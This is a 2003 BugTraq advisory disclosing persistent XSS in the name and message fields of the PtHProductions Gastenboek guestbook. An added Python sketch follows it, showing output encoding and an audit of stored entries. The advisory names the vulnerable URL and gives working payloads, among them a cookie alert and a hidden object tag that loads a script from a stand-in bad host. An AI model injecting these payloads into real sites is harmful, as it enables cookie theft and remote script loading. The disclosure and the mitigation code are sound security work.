BugTraq
PtHProductions Gastenboek - XSS Sep 01 2003 04:57PM
morning_wood (se_cur_ity hotmail com)
------------------------------------------------------------------
- EXPL-A-2003-022 exploitlabs.com Advisory 022
------------------------------------------------------------------
-= PtHProductions Gastenboek =-

Donnie Werner
Aug, 29 2003

Vulnerability(s):
-----------------
1. Persistent XSS injection

Product:
--------
PtHProductions Gastenboek

Description of product:
-----------------------
Guestbook for / by www.pthproductions.be

VULNERABILITY / EXPLOIT
=======================
The message and name fields allow XSS injection

view - Bekijk gastenboek
post - Teken gastenboek

http://www.pthproductions.be/jongeren/Gastenboek/sign.asp

input XSS of your choice
<SCRIPT>alert(document.domain);</SCRIPT>
<SCRIPT>alert(document.cookie);</SCRIPT>
or
<object style="display:none" data="http://verybad-exploit-url/bad.js"></object>

Local:
------
no

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
helpdesk (at) pthproductions (dot) be
Concurrent with this advisory

Credits:
--------
Donnie Werner
morning_wood (at) e2-labs (dot) com
exploited? http://exploitlabs.com
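
Added example, not part of the original advisory and not the vendor's code: a Python sketch of the two defensive steps this report implies, HTML-encoding the name and message fields at output time and auditing already-stored entries for markup. The entry layout, function names and sample rows are assumptions; the guestbook itself is an ASP application whose source the advisory does not show.

```python
import html
from html.parser import HTMLParser

# Constructed sample rows standing in for stored guestbook entries; the
# markup-bearing values are the three test strings quoted in the advisory.
ENTRIES = [
    {"name": "Jan", "message": "Mooie site!"},
    {"name": "<SCRIPT>alert(document.domain);</SCRIPT>", "message": "hi"},
    {"name": "x", "message": "<SCRIPT>alert(document.cookie);</SCRIPT>"},
    {"name": "y", "message": '<object style="display:none" '
                             'data="http://verybad-exploit-url/bad.js"></object>'},
]

class _TagCollector(HTMLParser):
    """Records every element an HTML parser would build from a value."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(value):
    # Parse the value as HTML and return the element names found in it.
    parser = _TagCollector()
    parser.feed(value)
    parser.close()
    return parser.tags

def render_unsafe(entry):
    # Behaviour the advisory describes: stored fields are written out verbatim.
    return "<p><b>%s</b>: %s</p>" % (entry["name"], entry["message"])

def render_encoded(entry):
    # Mitigation: encode both fields when the entry is written into the page.
    return "<p><b>%s</b>: %s</p>" % (
        html.escape(entry["name"], quote=True),
        html.escape(entry["message"], quote=True))

def audit(entries):
    # Persistent XSS stays in storage, so list entries that already hold markup.
    hits = []
    for i, entry in enumerate(entries):
        for field in ("name", "message"):
            tags = tags_in(entry[field])
            if tags:
                hits.append((i, field, tags))
    return hits
```

With encoding in place, every entry parses to only the template's own p and b elements, while audit() points at the stored rows that need review or cleanup.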
